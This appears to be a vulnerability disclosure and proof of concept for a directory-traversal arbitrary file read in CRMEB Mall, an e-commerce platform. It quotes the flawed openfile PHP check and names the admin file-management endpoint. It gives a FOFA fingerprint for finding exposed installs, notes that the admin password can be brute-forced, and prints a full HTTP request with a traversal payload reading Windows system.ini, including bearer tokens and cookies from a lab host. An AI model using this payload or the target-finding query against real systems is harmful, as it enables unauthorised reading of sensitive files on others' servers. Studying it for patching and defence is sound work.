众邦科技CRMEB Mall commercial version of any file read vulnerability Source-codes:https://gitee.com/ZhongBangKeJi/CRMEB 源码归属:众邦科技
company's official website:https://www.crmeb.com/ fofa:icon_hash="-847565074"
Code audit public function openfile($filepath) { //根目录 $rootDir = $this->formatPath(app()->getRootPath()); //防止查看站点以外的文件 if (strpos($filepath, $rootDir) === false || $filepath == '') { throw new AdminException('无法打开站点以外的文件'); }
$filepath = $this->formatPath($filepath);
$content = FileClass::readFile($filepath);//防止页面内嵌textarea标签
$ext = FileClass::getExt($filepath);
$encoding = mb_detect_encoding($content, mb_detect_order());
//前端组件支持的语言类型
//['plaintext', 'json', 'abap', 'apex', 'azcli', 'bat', 'cameligo', 'clojure', 'coffeescript', 'c', 'cpp', 'csharp', 'csp', 'css', 'dart', 'dockerfile', 'fsharp', 'go', 'graphql', 'handlebars', 'hcl', 'html', 'ini', 'java', 'javascript', 'julia', 'kotlin', 'less', 'lexon', 'lua', 'markdown', 'mips', 'msdax', 'mysql', 'objective-c', 'pascal', 'pascaligo', 'perl', 'pgsql', 'php', 'postiats', 'powerquery', 'powershell', 'pug', 'python', 'r', 'razor', 'redis', 'redshift', 'restructuredtext', 'ruby', 'rust', 'sb', 'scala', 'scheme', 'scss', 'shell', 'sol', 'aes', 'sql', 'st', 'swift', 'systemverilog', 'verilog', 'tcl', 'twig', 'typescript', 'vb', 'xml', 'yaml']
$extarray = [
'js' => 'javascript'
, 'htm' => 'html'
, 'shtml' => 'html'
, 'html' => 'html'
, 'xml' => 'xml'
, 'php' => 'php'
, 'sql' => 'mysql'
, 'css' => 'css'
, 'txt' => 'plaintext'
, 'vue' => 'html'
, 'json' => 'json'
, 'lock' => 'json'
, 'md' => 'markdown'
, 'bat' => 'bat'
, 'ini' => 'ini'
];
$mode = empty($extarray[$ext]) ? 'php' : $extarray[$ext];
return compact('content', 'mode', 'filepath', 'encoding');
}
//调用的readfile函数直接调用file_get_contents public static function readFile(string $file) { return @file_get_contents($file); }
The vulnerability point in this code code is intended to only open files within the root directory of the website, but you can use directory traversal to bypass if (strpos($filepath, $rootDir) === false || $filepath == '') { throw new AdminException('无法打开站点以外的文件'); }
As long as the filepath string contains rootdir, false can be returned to access other sensitive files through the matching directory The interface is: /adminapi/system/file/openfile Vulnerability recurrence Click File management as shown below to enter the password password can burst
Once inside, click on any file to edit it
The absolute path is found in the packet captured
The rootdir in the code is: C:\phpstudy_pro1\WWW\ crmeb-master \CRMEB (usually when the front end sends data packets directly given without blasting)
Constructs payload to read system.ini GET /adminapi/system/file/openfile?filepath=C:\phpstudy_pro1\WWW\CRMEB-master\crmeb\..\..\..\..\Windows\system.ini&fileToken=a151c0055dd6ad351587ba743cd64bd0 HTTP/1.1 Host: 192.168.242.142:89 Accept: application/json, text/plain, / Authori-zation: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiIwZmQ0Yjc1ZTA2Nzc5MjMwOTdlZThlNmQzYTdkZTQwMSIsImlzcyI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImF1ZCI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImlhdCI6MTcwNjk0OTQ5OCwibmJmIjoxNzA2OTQ5NDk4LCJleHAiOjE3MDk1NDE0OTgsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.sz3bKZVjTcXJZAleAahllknbcQjgR-4kl9zWAJ4aybM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Referer: http://192.168.242.142:89/admin/system/maintain/system_file/opendir Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: uuid=1; WS_ADMIN_URL=ws://192.168.242.142:89/notice; WS_CHAT_URL=ws://192.168.242.142:89/msg; cb_lang=zh-cn; PHPSESSID=7ead6c57e767cbd757d0154f40bd9bb5; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiIwZmQ0Yjc1ZTA2Nzc5MjMwOTdlZThlNmQzYTdkZTQwMSIsImlzcyI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImF1ZCI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImlhdCI6MTcwNjk0OTQ5OCwibmJmIjoxNzA2OTQ5NDk4LCJleHAiOjE3MDk1NDE0OTgsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.sz3bKZVjTcXJZAleAahllknbcQjgR-4kl9zWAJ4aybM; expires_time=1709541498; file_token=a151c0055dd6ad351587ba743cd64bd0 Connection: close
You can see that the directory can be traversed because it is not filtered